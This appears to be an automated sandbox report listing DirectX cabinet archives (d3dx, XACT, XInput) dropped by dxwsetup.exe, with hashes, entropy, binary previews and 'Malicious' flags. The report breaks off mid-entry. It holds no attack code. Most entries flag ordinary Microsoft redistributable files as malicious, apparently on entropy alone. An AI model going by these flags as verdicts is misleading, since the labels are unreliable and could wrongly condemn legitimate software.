                                                                                              SHA-512:FA007F257F5267119B247EC4ED368E51FD73E6AEA3097E2FC4E78078C063AF34D161FD1BDCAF3097BB575D2614DBA226A624D060009EE4F7BEDA697EFCF42BB7
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....(......D............................(...#..............G...7..........2b} .d3dx9_26_x86.cat...#.7......2Z| .d3dx9_26.dll......,#....2.} .d3dx9_26_w9x.inf......-#....2.} .d3dx9_26_x86.inf......0#....2.} .jun2005_d3dx9_26_x86.inf...N..>..CK..X....'.. ..P.....&!. .%.A........`.....;v..WTd..........w......{.{..<'...3..;}....=Xv3.e.vc:.yg.i.....1.....V.F.:.fMj ,.|.e.....F..5#?.|6.M.j[Z..k3.....g.f.B(..=v......a<.7..a.=.:...h.f.X6.."..I..I......Od:.!9......~1.H..q.....'....y..\...E..u.S|K.a...:c..B..8g:!?._..E:.A.H...N.a..j..~pI.....V.k.l.W.....X..........`4.2(.....e.>...0...!L..>p.....2d..r<...afffPK.6..t0.V.'HA.....j.o...5B+. .....hy...... M..5t...K.<>..@.G........~h..Xw.B.....F~>.?l..7..].}Xp.m.!......x~6.aY_*.rmH..sr.."Q*..]..d3.{.bXX`P....io...AZ.i..$..1....Gl.....d..AM:6.......p./(..Q.1..1..q....O.c~.c........04...|s3...}..x..I.r..).m.K1.o#.Q.Fa...X7.baY......G{......Z5S.HU..c.tp.z6.4m.B=P...d.6...g.....W..aM...z...L.R.W%...z.F.n.5....54EG.R

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Jun2010_d3dx11_43_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 103485 bytes, 5 files, at 0x44 "d3dx11_43.dll" "d3dx11_43_x86.cat", flags 0x4, ID 7298, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):112653
                                                                                              Entropy (8bit):7.991810619702373
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:tXMVzDTlrM28bEHSqgik2ono4DQQ/7cuBFbb9aD4:tXMxNjG4gikye5FBtBr
                                                                                              MD5:061BBA3836B3FFCBB01B150467BBE951
                                                                                              SHA1:00D8FBCD4068B3199D3D393BB4B86BF82985480D
                                                                                              SHA-256:B80DB68CD82CAF8BEDAEE62808171B20C546A76499C3AD53014E3BD2FBD2918D
                                                                                              SHA-512:AEC8327E1CCC0B33B3E32D66A5EE25C4B70A227B708D10F61EBAD2D998F3BE68145FA85C50BAA16A21EE766B336B1432FBEC02C75D698793092015C832B6FC26
                                                                                              Malicious:true
                                                                                              Preview:MSCF....=.......D...........................=....#..................`..........<!]..d3dx11_43.dll.....`......<B'..d3dx11_43_x86.cat............<.&..d3dx11_43_x86.inf.(..........<.&..d3dx11_43_x86_xp.inf.c..........<.&..JUN2010_d3dx11_43_x86.inf.kK.*. ..CK.|.\.U........:(.....;.........\.".+...K......a....f*.eZVZf../M.2M1M35.bj..%~gf.,gv.........~>..<..{.y.93.{fv.c..(%EQ*d......?...?...z.i.^u=.g.b..>.%....*..*s...\Qa..'[.U5....c|Z...Zl.....m....\u....s....|.....2...s..*.rE^ Wn..J..j|.$...2....mO.ul.E.V..c.7R...E..+t...2p....@>.V`..<.).Rp..*_UrI{h.../Z..0|...sQJ*ACQ..J....*.F%..W.T..*....E.{P.....1..A..U.6...2.J..|^a|.....Zl....|.>.tT.P.x..=C.......V..b'^..*K....}.s...op.....?..'=...2T>.l).....l.2Od?E*.S.....V .GV.l<.Q. .Bv.]7......d...MB..,..72Od..WR...D.6.M.V!{...d%..B...@.L..j..:..(.=.G....b..BV.l...d....B........p%u....F.....l.!.G..l.2.,.. d...|..Qm.v....G..L...).C..c.#.Ih...................ee.......VPL....8X...H1.=A1...q....2.E!.l..M.E..jTw.z.y..*d....m...Y.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Mar2008_d3dx10_37_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 812300 bytes, 6 files, at 0x44 "d3dx10_37.dll" "D3DCompiler_37.dll", flags 0x4, ID 8943, number 1, extra bytes 20 in head, 58 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):821468
                                                                                              Entropy (8bit):7.9989494569533655
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:k8Yjgk28yEYvDLX3XmZcLHo9yLvTJqnrT+LprnNjjjGM6pdKi814DYnciABrI55V:1Yjp/yEcfLI9y4rORNYdKibxBrIS6
                                                                                              MD5:8234B9B90BCBB5077E1B5FAA0B66D1A9
                                                                                              SHA1:E9207C572FDEC592B7C17A7F9C6F875C8A55B1F0
                                                                                              SHA-256:6A2727269E6CAC7C4D2E316333D29BAC0DC1CD7F51C36C0C08B0388203DEDAD2
                                                                                              SHA-512:74C94A6E092D7C828FC1E3FAEE4B21917AFC3CACEC04F260754190D0533F93A58289763AC620E5A577F7865902023B30548CDA4D9E968C90EE13050AD6D1E8C5
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....e......D................"...........e...#..............:.............E8...d3dx10_37.dll...........e8....D3DCompiler_37.dll.f(..(.....e8K...d3dx10_37_x86.cat.I.........e8....d3dx10_37_x86.inf.i.........e8....d3dx10_37_x86_xp.inf.c...@.....e8....Mar2008_d3dx10_37_x86.inf...-..,..CK..\TU........[fz.,P..0}Q.a.L...T..`.f.;........i..io{n.*...ej.i.Yb........;w....r.....s...9.<g.%f.4.F.q...F.*"_zr.........6.4}..I.8.;o..9L..j.9.43..Z.....M`rl&..A.....n.b..Q.....;..).).MK{J...!...1..T'....:..&...,*O.k\.!}4.d.vH/5.0.....x-!.....{.c..@......Dm53SG.W..A..5..MK..P.?ZK64'd..%.4p......'..v.a-..3!...iYM...Jc.B.i..^.4.;.....b....:..i..'Ui{2.$m.t(w..w...Km..ZrM:..7g.p.w.m$..k..`..n..7JK.`...%..O..d..`....@2h.j.s.ZR.V....?..p-i.:../...@.X.&..:RK..y`"p.. ...a..\.@Y..l...<0.lB|6.d...Ac..N..=`.(..@.._.....)...`(....\..|....@.~i..-....z}.........]..'.........<0...d...A.h......e..@...6....,.....D0..A....A8...@K.a..6/.\.&t.$/.V.I.....f.".....t.$.....H..X.6....$

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Mar2009_d3dx10_41_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1034785 bytes, 6 files, at 0x44 "d3dx10_41.dll" "D3DCompiler_41.dll", flags 0x4, ID 8914, number 1, extra bytes 20 in head, 71 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1043953
                                                                                              Entropy (8bit):7.998757160305283
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:JAEjuCeK6JgAkPBJoBgsqDP8FbGACV0L/sW0G+vv2:JFuCeVJqyxqDUFb9CV8r
                                                                                              MD5:45E83CBA5710A1DE7D3990A288122E85
                                                                                              SHA1:23C4BFBDDCFB11ACB7C47C409825F039AF7EB908
                                                                                              SHA-256:B7DA29103CDF374DE0C09713CB985035EAC45FB8B394D3B8157D8A7562A89899
                                                                                              SHA-512:8C56D376D349AA00948E1F3C6168DADE76AC9A26ADE1AAC5A385DCF0253602F5A2973483D083425195DB6AD7717494FD3CF674F5549774AC608CEFA2A88BF0A7
                                                                                              Malicious:true
                                                                                              Preview:MSCF....!.......D................"..........!....#..............G...P.........i:k{..d3dx10_41.dll.h-..P.....i:k{..D3DCompiler_41.dll.......#...p:.r..d3dx10_41_x86.cat.I...a4#...p:.r..d3dx10_41_x86.inf.i....7#...p:.r..d3dx10_41_x86_xp.inf.c....:#...p:.r..Mar2009_d3dx10_41_x86.inf.Nn.>.0..CK.wT.I..{.G.C.QQ.#(I.T`..Q.........0.b..5`Xs..bD.@..f1.9..x....Yw..{...s..U...[.kjj.....h3...TV2.nFx92?~=....m.l.[n.[..(81)]..R&..Sd...J.,F!Se..Re..A..e..~}..b.e[.fd.np.+..[......R;.z.....v....N.~...ibx.h.S.....W...7..-.a.8...`...$u..A.0K....j1..g..A.^k1...Pj.]bm.ym..~t...+d..`*..LG}..X...#.J.....;'e.Z.-.2..m.0....[W..#......j.05.Z.R.!..:.jd..e.........O..7:...\....k..bY...s4W).. ..%.......:g............p..Z...... ..<5.2..].... ..X.,..!~.0...v..k.c.1.2..V.10.L.#.R.x.=.S.9.....27.S@.....d.* .p.l.d......}.\...;.e./.0 ...&.~...8.\...:.L;.'....R..."`;p.....>...........BhW6.I&..D.!.3`...M...>u.....S.A......E@...0.P..@8....v.9....X@..."e....'..`c...(...^..R.'p...4....{ ...f...2....h

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\OCT2006_XACT_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 176401 bytes, 6 files, at 0x44 +A "xact2_4_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 8466, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):185569
                                                                                              Entropy (8bit):7.996440771278114
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:m3ZITAOIgaJqZazyaNuGKQb5aML7XTXM9+37VD5d58Oxz+oKG+ONa8bW9uMBowLB:iImMo2aHb0MvDn3jdhzWONFob
                                                                                              MD5:CC568D26B5B4CDA021D528CF75B21699
                                                                                              SHA1:DD47A33950C9E3A88DEFCAA7EA331FB1F1BBAB97
                                                                                              SHA-256:662D4E5D005CDBA02FABB0D7A68A7B48ECAFDEBE21718D892833D5C482E5ADD7
                                                                                              SHA-512:24B53BBD82DEC594D9909352D1F2AFE69B6F082DB99AAB3385826C4E8D22F5C075F3C5A24C8104DBEEF2D894980319AF141C65D768A51936C75092A846F3C8AA
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................!...............#..................! ........<5o. .xact2_4_x64.cat..E..! ....<5o. .x3daudio1_1.dll.....9e....<5.. .xactengine2_4.dll.....Q.....<5.. .infinst.exe.....i.....<5.. .oct2006_xact_x64.inf...........<5.. .xact2_4_x64.inf...~.x:..[.....0...R.P...O....5H"... .I.XA.D..MtT....A..MJ....$."=P).y.IB.EJ..".`4..f.{..n..Z.....|w..5@.!&. ..Gm..D..M.@.<[....9gea..8e..C.b_....... .....D".f.@......gP|..B...2......{.........'.3H..K.RU...B....{.......).....m.I@ ...Q]....(.'$..'...._4....J^.._......R)0i(b......_./.....80.@..H.H......?..%N.F.<.>...".gt.P..........'.....7R.@.....6.....P.V...X.od..$....Oy.......} "o.}...HWza..../.%..d..o.F..q...D+...)..."..C... .2.8..f....<..=N...c.Z4[v'.......f...i,.....P...s7...K'...:..A..bW.......S%v.##3...c..Q..+.$kQ..2.....,..=^../'.._!.D.......$.T.n..Z..'.@.2....O...:Y'...@...?./......"Ti2}...N..=.kq...x.T.?.Tq.?..?IB....N.x..=.CTl........V9y.sCay............D.Q.'.?.8..8.....<A......).$'..g

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\APR2007_XACT_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 189806 bytes, 7 files, at 0x44 +A "xact2_7_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 10116, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):198974
                                                                                              Entropy (8bit):7.996718266567073
                                                                                              Encrypted:true
                                                                                              SSDEEP:6144:kr+0amjUgjJG0HRzMUxWDJkUMP9KeK17dq569:krPVzjf+pk9keKdq5q
                                                                                              MD5:FBB6AA140D5D0AA28A7561EA15D69E72
                                                                                              SHA1:26804276EDBB1EE23B96690B40A01BB9C723F7DA
                                                                                              SHA-256:7781F0494648989583D4AC7695B9C5310EEA76B6A102E15EA0FC7376250E4584
                                                                                              SHA-512:08D6F2EF3346229F71E9FD6904D99BCB69F0A03CBD2D428F0A3BA58836694B801446165814AEE120B4C5EB7046184B08FB49248F5E1941579B9CAEAF9FBA1B1A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....n.......D................'..........n....#..........*........).........6.. .xact2_7_x64.cat..E...)....e6Ge .x3daudio1_1.dll.h'...n.....6. .xactengine2_7.dll.h...B......6.. .infinst.exe............6D. .apr2007_xact_x64.inf.....B......6D. .xact2_7_x64.inf.%...E......6D. .xact2_7_x64_xp.inf.t%...8..[......[..1.P$.._.ww.U..UD*:WB...R..%D.J.?III].o7I. .o..7...._..1..3. ......@.......{.tz......-n.....n(..j..Z...m...[.dgi/wb.q...Cl..M.8.jmh|....h&"P`B ..%...c>..... .....D4...P..fo..D.....0.@...m...!...mT.......ir..q+)..r...*...o".D(.@A.)+.(..3..(.G.}.L ..p.....aF..,)..$.cr.1...J..%..|.)..=.K.H..Ep.....K..^...m6.......P....N@..I.|.|.'....@a.. "....H.d...1....&.!D......{.X-..\.S;0NOe.3,&......a.S~..;wd...R.Zt.7...J~..n.'.......J.e..'H.........@.~....T@..........y......8(2....9.p:...^...y...$....X*..b...c.N.Dprnd).$..d.mIv.,G.D.#..A..].1..A.L$].7`...;...L.....B!.....:..EA..1.V..?J.7..7...T.Bz....]..%t.7.F..5G:......."H..O9.....sAk.q.}1U.'I........o.t...jr.`v..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\APR2007_xinput_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 90857 bytes, 6 files, at 0x44 +A "xinput1_3_x64.cat" +A "xinput1_3.dll", flags 0x4, ID 9350, number 1, extra bytes 20 in head, 6 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):100025
                                                                                              Entropy (8bit):7.988437274786544
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:Mt5OSvuXSf2rbZu4Kmsr4eLRwPC5B9y7q:MTOBXSSpFI4/PM/ye
                                                                                              MD5:FAE84E0773A74F367124C6D871516B7B
                                                                                              SHA1:CAF8B9D7D4AF965BF445D052D1E835B680D6BBC3
                                                                                              SHA-256:86EE073C199B5080FE4F5BE6AC24BB1117FEA42E4BBCD828B4F0EC26C669B22C
                                                                                              SHA-512:CAF1381CAE7417B57FAEF56D0023BF90C90406748F8813AB85C687DDB81E2498D2F1D5F4BC154903FD5A19836E6F245CD6F5D3927A383F1ACC3BCC41B58FD09B
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....b......D................$...........b...#...................(.........6+. .xinput1_3_x64.cat.h....(.....6. .xinput1_3.dll.h..........6.. .infinst.exe.\...h......6H. .apr2007_xinput_x64.inf............6G. .xinput1_3_x64.inf.....a......6H. .xinput1_3_x64_xp.inf...<.6..CK.\.\S.?....H3`@....B.....t.....D!.! " ].{..`AW........b.k/(....fNN ..z.}...g..of.7...|3#.]4.j...."V.;u.".,..t.....*.. o.!G4.G.<........!.I.P.'..t-B..T.N5...U.......2..S.....:....Ju.S.Q..v"D%..y.KR..B...a (.4.....7......x!L.\..u@.@...B.-G0......A..g...Dj8.j..L.X.."0."...^...kP.&@.}.....PP..k.p..|.`..P..D"... .H.1.h.^.G...#...+Ls..7..!qH."@..."..;,....Iz;u.t....>..Ki.y.~.5M`)SR(..$....&P:........-F...@....-..C.&V....N...Z..!....~.....{X"eo.5.D6.u...Y.9...8.......pg8....g....4....j@.S..T..C.H..7..ID...!.HP}.....7U..@?1".yMi....aA.....[..&.M.0A..'L,.q. 6`..DZ...i2.t..(Sw...e..X..6 ..y$...>....D.&R......>....~..U.Z...X.B.5:HAn.IU..[ .*.MH...8..Tgg'.H.G$H.$........)a...E b.y.>........t.....dF.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Apr2006_XACT_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 173173 bytes, 6 files, at 0x44 +A "xact2_1_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8453, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):182341
                                                                                              Entropy (8bit):7.996367169399176
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:iP7n/mIkqSEiqQAK23yLLBIvm2dozls4yaqS0yaP/Y5UZEPnQ79:iPL+fRqQAD3Tvxd8l/zsg5UZEIp
                                                                                              MD5:6CA70CDB3FA575506BA4035E9A50D8E4
                                                                                              SHA1:A2A20F5F95A1AB293A188A55BF593A82EA0DCB7F
                                                                                              SHA-256:F82B2043B470BF0E711C3D05D758A379920340212437917B5D98AF0C14E7BFE0
                                                                                              SHA-512:A453CED526332ACE37861A0A862FFF3710EF74ED57965F28DD279F526A2F33C390E82FD2C49BEE75476E5B4C349C40A71EEE49EDAC720236A16780DFD700FE62
                                                                                              Malicious:true
                                                                                              Preview:MSCF....u.......D................!..........u....#..................! .........46f .xact2_1_x64.cat..@..! ....C4)E .x3daudio1_0.dll..`...`.....4.e .xactengine2_1.dll............4.d .infinst.exe............4.e .apr2006_xact_x64.inf............4.e .xact2_1_x64.inf.....9..[......Z..A.P%..?.....DIx?...=HG..R.62^...T)....:.A.8..;.$.(..8.-......(..{.m...w.{.M...H.a....:.\^.S-R....c...u.k.^..q...5.bbK.0i.w.U).........C3..0.............."..3}...n..n..H. .((...B.l..#*hp..(>.."-a.|.[TuB..1.V....L..B....^Pi..`.b.....Sx*C...%.$.!....L..`.A..4.f.\.a..s......319..2..0QP..j.&.P\.B..z.~.P..P..$O...pI....o.T.F.../.d..g4...@EX...$I.2.....r.....B...A.....:.....HH5.....h... ...^.3.T...w...;...n...H......M...R.*..W .y.H....GD...Q..%..........DJ.6.#.."G.}@/|.....-A....W.....J..d..1....'P.......|b.$.z..yL..Jg...._r..W....P5.Q`...qyy.. ..s..p.<[.fr!.uv:..3.Y..9j.#or.A.<..T....7*}.F..d.:.]......>..:...Qs...a.C-...3}..r...#AU..O?=.2.T...e...e......p.S...4.....`....9|..~R.I....

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Apr2006_xinput_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 40050 bytes, 4 files, at 0x44 +A "xinput1_1_x86.cat" +A "xinput1_1.dll", flags 0x4, ID 6338, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):49218
                                                                                              Entropy (8bit):7.962835058038329
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:rrXN+lWp5tvn2v0JeuXfYYJDyRIvwde6hecBLdKd+d4RUJ6HwyQs34VvD4:3gl6tfTVXwcWuqe6htcaJyQW4VvD4
                                                                                              MD5:E207FB904E641246F3F7234DB74121FC
                                                                                              SHA1:1BE8C50C074699BDD9184714E9022B7A2F8BF928
                                                                                              SHA-256:3FDF63211B0DD38069A9C1DF74D7BC42742DE003CEF72AD1486AAA92D74546FA
                                                                                              SHA-512:ED95D53BC351C98C0322753265B0A21C98DF97D0E2FBBC58A6836BFF374B7540B0CEA21371CD4A7EAD654210A42E1F9809CAC6E4EAE2ECF0EF2B88E220DC37F7
                                                                                              Malicious:false
                                                                                              Preview:MSCF....r.......D...........................r....#.............................46f .xinput1_1_x86.cat............4.d .xinput1_1.dll............4.e .apr2006_xinput_x86.inf.....R......4.e .xinput1_1_x86.inf...G..>..CK..\SG.8|....&l....-n.6....(Z........"PH..,...+.G.V..b..V....Zm.Z..Xm..ZQ..E.{.......}....&L.g.9s....Jz?tp..N.;.]Y....!...b......t.c..'D%v[...8.8..........F.spf2y,.Gpe.w.......d...o.vs.........G...).bQ....cE%....."..GH.`"....D..B!..i.1..... ..0.. ..K# ...@*...C!M....R....SDq.c...b....#!6....b.....(/.`.....Q....(.!.pE....lB.a....L.M..[..E.........|...;.H!..".P.j........9..<.t.l....]5w.;...R.9qQx...@x..8.........$.1.az!.Z..?.rDP+...c..)U'J..E.H..j....%.......w.;..x.O...>........`0.A4..d.....dT...Q.3..y0.."..].x"...|.C.bs.,...`..h..#D..y.v..OM.1u{..C .X.N......+0....f2...3;...@...P......Z.......H.x.E<....A.-.4OA.Vi.f......."n\....b\...\M+.e.....k.N.q.`....%.@.../Q..V.e...s..."w.......KI........4.u.p..J^.V....D....t.0J...H.HMVg.d....B.v.]..)..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Aug2005_d3dx9_27_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1071684 bytes, 5 files, at 0x44 +A "d3dx9_27_x86.cat" +A "d3dx9_27.dll", flags 0x4, ID 6926, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1080852
                                                                                              Entropy (8bit):7.999138982152864
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:sP2N00PXWcq4UsDMMlsOgDUaQFMBZ0To2xIG:sP2CuZQsVl96fQiZMo2xz
                                                                                              MD5:3E91448A7481A78318DCE123790EE31A
                                                                                              SHA1:AE5FE894790624BAD3E59234577E5CB009196FDF
                                                                                              SHA-256:8C062B22DC2814D4F426827B4BF8CFD95989FD986FB3AAA23438A485EE748D6D
                                                                                              SHA-512:F8318BD7CA4271FC328D19428E4688DA898B6D7FB56CC185AD661D4A18C8169392C63515D7DD2D0B65CBD1F23892D7A0A5D3D77A4CDA6230BA03B3B917E5C39A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....DZ......D...........................DZ...#..............H...<..........2.. .d3dx9_27_x86.cat..d#.<......2b. .d3dx9_27.dll.......#....2.. .aug2005_d3dx9_27_x86.inf.......#....2.. .d3dx9_27_w9x.inf.....p.#....2.. .d3dx9_27_x86.inf.]Z...>..CK..X.[...C.)...1(v.).. 3."J.P.. @(.&.Y..v...].....{.cW.$("..w.....yN<?v.5k.......q.Y..0......Z&.9N.!.....f.0.X...9b......fF......iL..+c...ff.tx.f....no.II...2.LO6..arY...u*..PZM..9.6f..H.<...._..G".K.1...R.I..|......=!....\O}<[/E.#..>.......+...........v!..C..:..Q.$.....s....LD.Q.i....h....b*..aB3c.a.b.W..c.151/,./r.rD>...(.i..%!.......\.......Sn.|t.[{F..Mq..\..5.d......J....J.3&....jN../S_N...Qg...gA..3..:...T.0f7.k..&.a.{o.+.j....:..j.f.s..54..`.}..g......?h....bf...w.(......C)(...$.........gJ~..`.;..P>...e.......c.C..@K...d0.@M0(.YM$.y..78..U.Y...J........W......A.04)...&4..{?....Ce..W.;..0m..x.9......n....Io!.!.>...o.......],OQ..0.Q..[KR5QrU.2)I...m.kU."<^..S..3.Q.....".b.F..UF.uJ....:lZ...p.2.R.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Aug2006_xact_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 176943 bytes, 6 files, at 0x44 +A "xact2_3_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8453, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):186111
                                                                                              Entropy (8bit):7.995685991314543
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:yglGrmTM3Ne3LnSYZr66OltMlRz/EFa6xoXJMOL7CmAvyl81g5K7VQLWRrZL:xESKSRr66OltMlWFa6xoMOL7vmGGCArN
                                                                                              MD5:4BA26F9DCCAEBD7BE849A076EC82D6FF
                                                                                              SHA1:42FB0D0089D8BC92735820F475968F59AF4E4365
                                                                                              SHA-256:13E7EB934A7596E7C3B7D8A0962E68DA841D9C73D154825DC982FF6D05CFF221
                                                                                              SHA-512:4E4FD8A31AC3C2F8CC66D434103C0097AB3FBE2C2E8140AAE2F95FC4AC1927AAE9CDCE8730DD7C4DAD785D9A653D90B0F914B258BB5695C68CA93F605AC82DD4
                                                                                              Malicious:true
                                                                                              Preview:MSCF..../.......D................!........../....#..................! .........4.R .xact2_3_x64.cat..@..! ....C4)E .x3daudio1_0.dll......`.....4.K .xactengine2_3.dll............4.K .infinst.exe.....!......4{R .aug2006_xact_x64.inf............4{R .xact2_3_x64.inf.+.{..9..[.........R.P...O...\7.$Hb...l...RI..(D7...G.)..0..J.zH)J.R..x$..H...........>>.evHh......;....d....xT6@'.u...Q.n...#s.......!.Pq...o...... ......X....,-....h... ......q..G.. ,.........(.~.CzJ8t.P..J.FHR|.D.........` d..PC/.N...I...<.'.o....8.t..t7.....Q.E%.J..8.l......t"....Z....&.(.p.:........n.ML.@..Ny........9......P'.|...w..@.{B!\.h.P.....:.G...t g.."..{.@'..u....z........|......#A..8.q....v..E@..g.@.~.\i@......`9..y.G..p._.b...C%K.....Y...6R3...v"..J.a>.Co.dcEOv&D:...~.A.Y..^......{.x........`n....].D~.E...(..^"..N'....W...g...?....9.}.?.....z.3q.......Y....AV.?_0.w[..F.......CU).76....6.O.C......|...I...@...|..bC..p.S......l... .H<.S.I. .f(..`*^..Y..W...._....0_...._9..yj.+X

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Aug2006_xinput_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 81182 bytes, 5 files, at 0x44 +A "xinput1_2_x64.cat" +A "xinput1_2.dll", flags 0x4, ID 7454, number 1, extra bytes 20 in head, 5 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):90350
                                                                                              Entropy (8bit):7.985841057262195
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:5lQFOMW9t2gGQtmxC4LbB8GXjgvW/j44krD+W2MLdk6v5yO1Ha6DB/4RPjz6ITda:rIOMWm+tmnbXjVkWW1lgO166cjz6z
                                                                                              MD5:A9D582E44E46E36F37EDB7CBC761179D
                                                                                              SHA1:ED1BEF64385E94CE89AFA704D38408E23B31FA79
                                                                                              SHA-256:C26633D38E0A91B9BE70382E916A83D50E219609F7E05CFB2D27DFAFBE480B43
                                                                                              SHA-512:20011BFB547DEDCE8E6FCEDA22C3A3A83DB140E8A20844F3B0E8741B4474C1FEA73D84708B801E83EAE3CD2D8A2D6C851C3F7CD0154C0382A78BC2C2DF6B01E5
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....=......D............................=...#.............................4.R .xinput1_2_x64.cat..G.........4.K .xinput1_2.dll......f.....4.K .infinst.exe.V...'m.....4}R .aug2006_xinput_x64.inf.....}p.....4}R .xinput1_2_x64.inf....%p9..CK.[.\SI.....I..1`D...]A......A....D .)4........E]...`.....^VV.........{.\.]......~./w.9s...9sf.E..k.....l@...Y....*...Cu4.....t......I.Q.<u)ey...k1...K0.)....u..+..{..&...Z....@=].X....'..$q*D...y.kZ.+..O..x .....F.@..........A.wd..........;......<@i.. ..s(G..J..".q.#..c.u...=.H<"A.H..C..;.>....43V.4..1y.;..j.yK"F}.F..#.RY.h.u.2.....p.C...u...b.:..E1.?f........H@]..;..DfR.T.%..-.....h....@...;...Z=@..pGb.b... .........n.....b>...R~...J...X...0.?..P7..........p6."/=.Z mI.r..X..x...ey...m#.>Pi.ZY.".....Xi..B..S.....7....=P7k}L..."bB.....;.....)...;..L...`B.PG.8.d..q....e.E*....D.T.$..H..X.A..,6..y.|..4..*.x...K.....o...6`mB.T+.B..0..[..Q4MS.D?.9j.+...<..'.0.9"...5.l-S...8.#H..XF..puM5#.8.R..7..2.L.p..'....\../.....a....

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Aug2009_D3DCompiler_42_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 894638 bytes, 5 files, at 0x44 "D3DCompiler_42.dll" "D3DCompiler_42_x86.cat", flags 0x4, ID 10010, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):903806
                                                                                              Entropy (8bit):7.998441664012848
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:kWl8lkb28nNHiYNk9tb59zmj000KFiBudeBsbgy:No8NHi7/pAJioEy
                                                                                              MD5:87BDAE64FD47A75F867A290EC7B8A4B7
                                                                                              SHA1:DD9E69E1815E8BC161E8EB89A0F2A296074BB95D
                                                                                              SHA-256:6BD32337826F5A5141FC06391919A249E984150905C2546DC8BFC33D41A24E82
